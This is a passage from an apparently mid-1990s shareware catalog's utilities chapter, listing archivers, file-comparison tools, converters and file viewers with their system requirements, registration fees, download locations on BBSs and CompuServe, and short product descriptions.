256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus utilities; all ASP-wide + offers (see page 5). + Look for: JRC102.ZIP on BBSs (call 519-940-0007 to download it at + no charge). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + Compresses files and stores them in an archive file. It has a + "concatenated archive" option that puts the files in the + archive first, then compresses it for better compression + ratios. Archives and the file extraction program may be + distribute without royalty and you may also create royalty-free + self-extracting archives. + + + Product: PMZIP + Author: + Version: 1.00 (01-14-91) + Needs: IBM AT (80286), OS/2 1.0 or better. PKZIP/PKUNZIP. + Registration fee: $29.00 + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; disks of other shareware. + Look for: availability unknown on BBSs; PMZIP.ZIP on CompuServe + in CIS:IBMOS2 forum LIBrary 1 (or contact userID 70056,241 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + An OS/2 Presentation Manager ZIP shell featuring + v/ Point and click SAA/CUA compliant interface for adding, + deleting, extracting, and viewing members of a ZIP file + v/ Multi-selection list box with the names, sizes, and date/ + time stamps of files in a ZIP file (double-click on a file + to view it) + v/ Extensive online hypertext help/documentation + v/ Easy installation + v/ All options can be saved and restored + v/ Support for File Manager Drag and Drop interface + + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 160. + + Chapter 2, "Utilities" 43 + + + + Product: PUT, GET, Install Utilities + Author: , 216-659-9489 + Version: 3.43 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 192k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $19.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: PUT343.ZIP on BBSs (call 216-661-9065 to download it at + no charge); PUT343.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + PUT343.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Utilites for compressing/decompressing and archiving/ + unarchiving files. Also for creating your own program + installing utility for your software packages. + + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 160. + + Product: QuickDir + DOS and archive shell. Custom directory tree. See full + description on page 9. + + Product: Rosenthal WinLite + Author: , 805-541-0910 + Version: 1.0 (10-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 256k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $149.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, CompuServe, GEnie, mail support; site license; all + ASP-wide offers (see page 5). + Look for: WINLITE1.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 242k (about 18 minutes with a 2400 baud modem) + Description: + Compress MS-Windows programs to dramatically reduce their size. + Programs compressed are functionally identical to the + originals, only smaller. For example, consider the 180k + "Solitaire" game that is bundled with MS-Windows 3.1. You can + compress it to less than 77k, or 43% of its original size. The + + Chapter 2, "Utilities" 44 + + + + smaller, more efficient programs save disk space, LAN overhead, + disk caching resources and discourage reverse engineering. + + + Product: RPF Zip Control + Author: + Version: 2.1.5 (12-03-94) + Needs: IBM 80386, OS/2 2.1 or better. VGA monitor. OS/2 ZIP/ + UNZIP utilities. + Strongly recommended: Mouse. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; all ASP-wide offers (see page 5). 12-month free + upgrading allowed. + Look for: ZIPCT215.ZIP on BBSs (call 703.385.4325 to download it + at no charge); ZIPCTL.ZIP on CompuServe in CIS:OS2SHARE forum + LIBrary 1 (or contact userID 71660,535 for assistance). + SWREG#: 1373 + Download size: 373k (about 28 minutes with a 2400 baud modem) + Description: + An easy-to-use 32bit PM program which shields the user from the + command line when using the OS/2 freeware ZIP.EXE & UNZIP.EXE + utilities. Users have a "point and click" view of the contents + of .ZIP files and can create new .ZIP files. + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 38. + + Product: Shez + Author: , 707-575-9868 + Version: 9.5 (10-29-93) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; CGA monitor; Hard + disk; Mouse. One or more compression programs: ZIP, LHA, ARJ, + ZOO, SQZ, or PAK. + Strongly recommended: HP LaserJet printer; XMS memory. + Registration fee: $39.00 + Registration benefits: quick-reference card; 3 months of BBS, + CompuServe, GEnie, mail support; bonus utilities; all ASP-wide + offers (see page 5). + Look for: SHEZ95.ZIP on BBSs (call 714-636-2662 to download it at + no charge); SHEZ95.ZI on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 76266,2634 for assistance); SHEZ95.ZIP on + GEnie in IBMPC forum LIBrary 0 (or contact userID J.DERR1 for + assistance). + SWREG#: 270 + Download size: 260k (about 20 minutes with a 2400 baud modem) + Description: + A program shell designed to make working with compressed files + a much eaiser task. Can handle ZIP, ARC, ZOO, LZH, PAK, SQZ, + AND ARJ compressed files. The user can use drop down menus to + manage their compressed files, or built in hotkeys can be used + for the more advanced user. Provides built-in context + + Chapter 2, "Utilities" 45 + + + + sensitive help for all functions, and provides a common + interface to all of the supported compressed file formats. You + can view, create, modify, convert, virus-check, and much more. + Mouse support. + + + Product: SQWEZ + Author: , 609-423-1989 + Version: 1.0 (04-16-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $1.50 for shipping to U.S. + addresses) (add $1.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; SQWZ1.EXE on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 74131,1704 for + assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An easy to use multi-file compression package that outputs a + self expanding program. File overwrite and CRC data checks are + used to help assure quality data compression and decompression. + Ideal for software authors to package their program files for + distribution. + + + Product: Stowaway True Archival System + Archive seldom used/inactive files to disks. See full + description on page 18. + + Product: Universal Install + Software installation development kit. See full description on + page 430. + + Product: ViDir/ViRes File Monitor System + Monitor file usage; eliminate unused files. See full + description on page 12. + + Chapter 2, "Utilities" 46 + + + + Product: WinZip + Author: + Version: 5.0 (11-08-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: PKZIP/PKUNZIP, ARJ, LHA, and a virus + scanning program. + Registration fee: $29.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + CompuServe, mail support; 1-month return policy; discounts on + upgrades. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: WINZIP*.ZIP on BBSs (call 703-680-9269 to download it + at no charge); WINZIP.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 70056,241 for assistance). + SWREG#: 402 + Download size: 199k (about 15 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, Shareware Industry Awards. + Description: + Bring the convenience of Windows to ZIP, ARJ, and LZH files + with an easy-to-use point-and-click interface. Features built- + in PKZIP-compatible ZIP and UNZIP, full drag and drop support, + and extensive help. View, run, extract, add, and virus scan + files in archives. + "Repeatedly Charms You" - Windows Magazine, 12/92 + "Must-have Shareware Treasure" - Compute, 10/92 + "Powerful Yet Intuitive" - PC World, 8/92 + "WinApp of the Month" - PC Computing, 3/92 + + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 164. + + Product: Zip Pro + Author: , 905-276-8835 + Version: 1,0 (11-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; CGA + monitor; XMS memory. + Strongly recommended: VGA monitor; Hard disk; Mouse; Network + (LAN). + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; all ASP-wide offers (see page 5); + + Chapter 2, "Utilities" 47 + + + + discounts on upgrades. 6-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: ZP_ARC10.ZIP on BBSs; ZP_ARC.EXE on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 74167,722 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + With built-in Zip/UnZip, encryption, multivolume, drive windows + with tree and file views, Zip lists, Zip views and unique + interface features to simplify and animate Drag & Drop. PKZIP + not required. Fully PKZIP 2.04g compatible. Not just a shell, + this application brings real Zip functionallity to Windows and + makes it visual and simple to use. The Drag Bubble make Drag & + Drop a truly intuitive experience. + + + Product: Zip Server(TM) + Author: , 310-832-6984 + Version: 1.5 (09-30-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: SVGA monitor; Mouse; XMS memory; math + coprocessor. + Registration fee: $39.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 5). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; ZIP_SERV.E on CompuServe + in CIS:WINSHARE forum LIBrary 3 (or contact userID 71744,3633 + for assistance). + SWREG#: 5205 + PsL#: 14003 + Download size: 794k (about 59 minutes with a 2400 baud modem) + Description: + A tool for creating, updating, viewing and extracting PKZIP + 2.04g compatible archives by loading ZS as a visible + application or using it remotely and invisibly from another + Windows application. Multi volume archives. Sample code for + using with Visual Basic and with MSWord 6.0. LAN. Development + kit + DLL. + + Chapter 2, "Utilities" 48 + + + + Product: ZiPaper + Author: , 714-524-5625 + Version: 1.3c (12-30-91) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk. PKZip/PKUnzip or LHArc. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited BBS, CompuServe, mail + support; bonus graphics; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; ZIPAPR.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 10 (or contact userID 72301,2164 + for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + Randomly selects .BMP files for wallpaper each time you run + Windows. Keep the .BMP files in one ZIP or LHArc file. Save + disk space! Supports tile/center and more. Support for multiple + ZIP files, manual selection of BMP file, LHArc and more. + + + 2.2.4 File comparison + + Product: DIFF + Author: + Version: 1.21 (10-15-94) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of CompuServe, mail support; 1-month return policy; all + ASP-wide offers (see page 5); disks of other shareware. + Look for: DIFF121.ZIP on BBSs; CSDIFF.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 73030,1070 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + Displays the differences between two text files or between two + directories or ZIP archives. The two text files (or + directories) are displayed side by side. Common and different + sections are clearly marked with separator lines. Especially + useful for programmers who wants to see the differences between + two versions of a source text file or to show the differences + between two sets of files, where one or both sets can reside in + a ZIP archive. Various formatting and comparison options are + available. + + + Product: FootPrint + File tracking: daily, softwre install, audit. See full + description on page 15. + + Chapter 2, "Utilities" 49 + + + + Product: PMFLCOMP + Author: , 919-846-2014 + Version: 1.61 (05-30-95) + Needs: IBM 80386, OS/2 2.0 or better. 4000k RAM; Hard disk. + Strongly recommended: CGA monitor; Hercules monitor. + Registration fee: $45.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5); disks of other + shareware. 3-month free upgrading allowed. 2 free update + disk(s) sent out. + Look for: PMFLCOMP.ZIP on BBSs; FLCOMP.ZIP on CompuServe in + CIS:OS2USER forum LIBrary 4 (or contact userID 74150,2370 for + assistance). + SWREG#: 1918 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Compares two files using three different methods: + 1. Ascii/line: compares two files on a line by line basis. + An excellent tool for comparing differences in source + programs. + 2. Hex/binary: compares two files on a byte by byte basis. A + comprehensive listing to compare right down to the bit + level. + 3. Checksum: comparees two files by calculating a checksum + value for both files. The fastest way to compare two + files. Provides options to customize the comparison type. + + + Product: SHERLOCK + Author: , 301-460-0354 + Version: 2.73 (12-28-93) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $25.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: SHERL273.ZIP on BBSs (call 202-547-2008 to download it + at no charge); SRL273.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73270,77 for assistance). + Download size: 121k (about nine minutes with a 2400 baud modem) + Description: + A text comparison utility, compares two ASCII files line by + line. Displays five lines from each file in separate windows. + You may scroll either or both files passed the mismatch to put + them in sync and continue. Either file can be automatically + scanned to locate a line matching the line selected in the + other file. Contains features for searching, ignoring case, + spaces, tabs, jumping around the files and copying lines to a + printer. This is a tool for programmers and writers. + + Chapter 2, "Utilities" 50 + + + + Product: TextPad 16 + TextPad 1.30: 16-Bit Text Editor. See full description on + page 190. + + Product: TextPad 32 + TextPad 1.30: 32-Bit Text Editor. See full description on + page 190. + + Product: WDiff + Author: + Version: 1.30 (05-29-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; bonus utilities; all ASP-wide offers (see + page 5); disks of other shareware. + Look for: WDIFF130.ZIP on BBSs; WDIFF.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 73030,1070 for + assistance). + SWREG#: 1772 + PsL#: 11663 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Displays the differences between two text files or between two + directories or ZIP archives. The two text files (or + directories) are displayed side by side. Different sections are + marked with separator lines and different colors. Especially + useful to see the differences between two versions of a text + file or to show the differences between two sets of files, + where one or both sets can reside in a ZIP archive. Various + formatting and comparison options. + + + 2.2.5 File sorting & conversion + + See also: Writing applications, Writing utilities, File format + translators; Spreadsheet applications, Spreadsheet utilities, + File format translators; Database applications, Database + utilities, File format translators; Communications, + Communication utilities, File format translators; Graphics, + Utilities, Cataloging tools. + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 38. + + Product: ACZAR for Windows + Windows archive/compression shell. See full description on + page 39. + + Chapter 2, "Utilities" 51 + + + + Product: AsciiConvert + Author: , 610.640.0339 + Version: 1.00 (09-05-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; ASCIIC.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 7285 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Restructures comma-delimited ASCII files so that they can be + imported to databases more easily. Functions include field re- + sequencing, new fields, constants, dates, field concatenation/ + merge, remormatting, etc. + + + Product: Bigsort + General purpose data sorting utility. See full description on + page 245. + + Product: dPerfect Merge + Author: , 619-793-8300 + Version: 2.0 (05-16-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, CompuServe, mail support; 3-month limited return policy; + bonus utilities; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; DPERF.ZIP on CompuServe + in CIS:WPUSERS forum LIBrary 21 (or contact userID 73170,216 + for assistance). + SWREG#: 3319 + PsL#: 10595 + Download size: 229k (about 17 minutes with a 2400 baud modem) + Description: + Converts xBase compatible data (dBase III/IV/5, Fox, Clipper, + etc.) to Word Perfect (4.2-6.x) secondary files for mail merge + applications. Features record and field selection, and record + sorting. Allows American/European date format. Converts + European characters. Single- or multi-user. Prints summary + sheets and creates setup files to automate the conversion. + + Chapter 2, "Utilities" 52 + + + + Includes data base browser, memo-field conversion and support + for latest versions of dBase and Word Perfect. + + + Product: Extract It + Author: + Version: 1.00 (07-14-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Strongly recommended: Hard disk. + Registration fee: $17.95 (add $4.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; + discounts on upgrades. 1-month free upgrading allowed. + Look for: availability unknown on BBSs; EXTRIT.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 70751,3507 for + assistance). + SWREG#: 6606 + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + A DOS-based data report extractor utility. It enables you to + extract and export selected fields from an ASCII report file to + a standard ASCII delimited file. This file can be imported to + just about any database or spreadsheet application. An + incredible value! + + + 2.2.6 File viewers + + See also: Writing applications. + + Product: 4EDIT + File description editor for 4DOS. See full description on + page 180. + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 38. + + Product: ACZAR for Windows + Windows archive/compression shell. See full description on + page 39. + + Product: DEXTER Text Editor + Premium quality multi-file text editor. See full description + on page 186. + + Product: DIFF + File/Directory/ZIP difference utility. See full description on + page 48. + + Chapter 2, "Utilities" 53 + + + + Product: Drag And View + Author: , 415-382-7999 + Version: 2.0 (07-12-93) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor; Hard + disk. Any file manager that supports drag and drop. + Strongly recommended: VGA monitor. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; DRAGVU.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 74774,554 + for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + Lets users view files in their native formats. You use it by + dragging files from Win file manager to DV's icon. It will + open up a window displaying the first file in the group in its + native format. Users can look at other files in the group by + choosing their name from the "Filelist" menu. Multiple window + viewing. Search, Goto. Formats supported: ASCII, Hex, Word, Win + Word, Write, WordPerfect, Ami Pro, xBase, Excel, Quattro, + Lotus, Paradox, BMP, ICO, PCX, GIF, TIF, ZIP, LZH. + + + Product: E-report + Author: , 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $39.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; EREPRT.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 2 (or contact userID 76534,1166 + for assistance). + SWREG#: 6520 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Don't print your management reports! R-report reads all ASCII + print files and automatically creates permanent indexed + hierarchical outlines of the reports. Innovative Indexing-by- + Example method. View any section of the report instantly by + clicking on the outline. Search, split screens, export, file + compression, passwords. + + Chapter 2, "Utilities" 54 + + + + Product: EDDY (EDit DirectorY) [***] + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: EMERI + Reads your Windows Cardfiles from DOS! See full description on + page 245. + + Product: INFOMANIA + Indexes text files/finds offline text quickly. See full + description on page 11. + + Product: Inspect & Install for Windows + Setup utilities for Windows/Windows NT. See full description + on page 428. + + Product: Katelin Comment Manager + Author: , 217-662-6780 + Version: 1.20 (09-26-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse; Epson printer. + Registration fee: $22.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $11.25 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades; + registration commissions. 12-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs; COMMAN.EXE on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 76530,350 for + assistance). + Download size: 767k (about 57 minutes with a 2400 baud modem) + Description: + Lets the user attach narrative to your files in your own words. + Comments can be cut and pasted between files. Files can be + copied, moved, renamed, and duplicated while comments remain + intact. Seach for comments in files, search for files and text + in files. Launch your favorite programs without opening + Program Manager. View text and graphic (WMF, GIF, PCX, BMP, + ICO, TGA) files, also print/copy graphic files. Complete + directory maintenance functions. + + Chapter 2, "Utilities" 55 + + + + Product: MultiVu + Author: , 610-328-1145 + Version: 1.1 (03-17-95) + Needs: IBM AT (80286), Windows 3.0 or better. CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; bonus utilities; all ASP- + wide offers (see page 5). 1 free update disk(s) sent out. + Look for: MULTVU11.ZIP on BBSs (call 215-322-5114 to download it + at no charge); MULTVU.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 1 (or contact userID 71221,3602 for assistance). + SWREG#: 2993 + PsL#: 11408 + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + A Windows utility for viewing files up to 2 GB. Scans your + disk for text or files. Searches for text lightning fast. Keep + up to 20 files open. Drag'n'Drop support. File preload for + smooth scrolling. Background operation: load, search, print + while browsing or using other programs. Maintain bookmarks in + each open file. Separately control screen and printer fonts. + Supports multiple concurrent users on a LAN. Now, multi-select + files, select text color, browse archive (zip, arj, lzh) files. + + + Product: PMFLCOMP + ASCII/hex/checksum file compare for OS/2. See full description + on page 48. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 248. + + Chapter 2, "Utilities" 56 + + + + Product: QRead + Author: , 508-250-1351 + Version: 2.0 (03-23-95) + Needs: IBM 80386, Windows 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + EGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $23.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 5); discounts on other products; discounts on upgrades. + Look for: QREAD.ZIP on BBSs; QREAD.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 6 (or contact userID 70731,1673 for + assistance). + SWREG#: 5341 + Download size: 259k (about 19 minutes with a 2400 baud modem) + Description: + Lets you read text files quickly and easily in the Windows + environment. Automatically adjusts the font size or the line + structure to fit the window. Helps you keep track of your + files with reading lists. Lists store file descriptions of up + to 995 characters for easy access to information. Also + provides: reading timers, clipboard view, multi-file search, + and many other tools to make reading on the screen easier. + + + Product: SCAN + Author: + Version: 494 (04-04-94) + Needs: IBM AT (80286), DOS 2.0 or better. 640k RAM; Hard disk. + Strongly recommended: Epson printer. + Registration fee: $5.00 (add $2.00 for shipping to Canadian + addresses) (add $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support; bonus utilities; all ASP-wide + offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A text file viewer (PLUS). Use it to browse around your hard + disk, view and/or print text files, and delete old files that + are just cluttering up your directories. It is quick and EZ to + learn, and fun to use. No mouse is needed. + + Chapter 2, "Utilities" 57 + + + + Product: SEE (File Viewer) + Author: , 216-659-9489 + Version: 5.10 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 64k RAM. + Strongly recommended: Mouse. + Registration fee: $12.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: SEE510.ZIP on BBSs (call 216-661-9065 to download it at + no charge); SEE510.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + SEE510.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Displays any size file with vertical and horizonal scroll bars + and full mouse support. You can freeze the top rows and left + columns as you scroll the rest of the text in any direction. + Can print files and can search for text strings and find + multiple occurances. + + + Product: Simply Docs + Author: + Version: 2.1 (10-29-93) + Needs: IBM PC, DOS 3.1 or better. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, mail support; royalty-free + runtime license; 3-month free upgrading allowed. + Look for: SIMDOC21.ZIP on BBSs (call 709-489-6018 to download it + at no charge). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + Compile ASCII text files into EXE/TSR format. Turn README into + RUNME. Use it for program manuals, electronic books, + newsletters, catalogs, master lists, etc. Features easy to use + viewer, search function, extensive support for color documents, + bookmarks, hypertext jumps, print to any device or file, print + any range of pages, print on any printer, auto scrolling, TSRs + swap to EMS/Disk (3.5k), small file size, large documents. + Great program for anyone who distributes text files. + + Chapter 2, "Utilities" 58 + + + + Product: TC's Toolbox + Author: , 612-722-9659 + Version: 2.3 (02-17-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: VGA monitor; Modem. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of CompuServe, mail support; discounts on upgrades. + Look for: availability unknown on BBSs; TCT230.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 4 (or contact userID 76470,3424 for + assistance). + SWREG#: 4772 + PsL#: 11838 + Download size: 860k (about 64 minutes with a 2400 baud modem) + Description: + Hex file viewer: view files in a hex & ANSI/ASCII format, + search & compare files, play sound files & more. Font viewer: + display entire font, lists fonts by family, show keyboard map. + System monitor: displays Windows resources. Calendar: monthly + calendar with events you provide. Phone dialer, text editor, + code reference, stopwatch, save it! Contains too many features + to describe here. All come with help files. + + + Product: Technical Editor (DOS) + DOS virtual programmers editor. See full description on + page 189. + + Product: Technical Editor (OS/2) + 32-bit programmers editor for OS/2 2.x. See full description + on page 189. + + Product: TextPad 16 + TextPad 1.30: 16-Bit Text Editor. See full description on + page 190. + + Product: TextPad 32 + TextPad 1.30: 32-Bit Text Editor. See full description on + page 190. + + Product: ToolBOX + A simple yet uniquely powerful DOS shell. See full description + on page 19. + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 99. + + Chapter 2, "Utilities" 59 + + + + Product: VIEW_MAN + Author: , 813-377-2515 + Version: 1.10 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. 200k RAM. + Registration fee: $25.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 5); disks of other + shareware. + Look for: VMAN110.ZIP on BBSs (call 813-371-2490 to download it + at no charge); VIEMAN.ZIP on CompuServe in CIS:IBM forum + LIBrary 